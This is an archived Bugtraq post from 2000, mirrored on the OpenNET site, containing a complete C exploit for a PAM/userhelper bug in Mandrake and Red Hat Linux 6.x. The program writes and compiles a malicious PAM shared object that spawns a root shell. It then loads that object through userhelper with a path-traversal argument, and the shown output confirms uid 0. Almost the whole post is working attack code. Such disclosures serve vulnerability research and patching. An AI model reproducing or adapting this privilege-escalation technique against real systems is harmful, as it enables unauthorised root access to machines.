The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Новость: Включаем поддержку S/MIME в Pine и Mutt.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Exploit for Mandrake 6.1 (PAM/userhelper bug)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 15 Mar 2000 00:14:05 +0000
From: Paulo Ribeiro <prrar@NITNET.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Exploit for Mandrake 6.1 (PAM/userhelper bug)

/*
 * pam-mdk.c (C) 2000 Paulo Ribeiro
 *
 * DESCRIPTION:
 * -----------
 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
 * I created this C program based on it which exploits PAM/userhelper
 * and gives you UID 0.
 *
 * SYSTEMS TESTED:
 * --------------
 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
 *
 * RESULTS:
 * -------
 * [prrar@linux prrar]$ id
 * uid=501(prrar) gid=501(prrar) groups=501(prrar)
 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
 * [prrar@linux prrar]$ ./pam-mdk
 * sh-2.03# id
 * uid=0(root) gid=501(prrar) groups=501(prrar)
 * sh-2.03#
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        FILE *fp;

        strcpy(argv[0], "vi test.txt");

        fp = fopen("abc.c", "a");
        fprintf(fp, "#include<stdlib.h>\n");
        fprintf(fp, "#include<unistd.h>\n");
        fprintf(fp, "#include<sys/types.h>\n");
        fprintf(fp, "void _init(void) {\n");
        fprintf(fp, "\tsetuid(geteuid());\n");
        fprintf(fp, "\tsystem(\"/bin/sh\");\n");
        fprintf(fp, "}");
        fclose(fp);

        system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
        system("chmod 755 abc.conf");
        system("gcc -fPIC -o abc.o -c abc.c");
        system("ld -shared -o abc.so abc.o");
        system("chmod 755 abc.so");
        system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
        system("rm -rf abc.*");
}

/* pam-mdk.c: EOF */

___________________________________
Paulo Ribeiro	prrar@nitnet.com.br

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
InterReklama Advertizing
Интерреклама. Интернет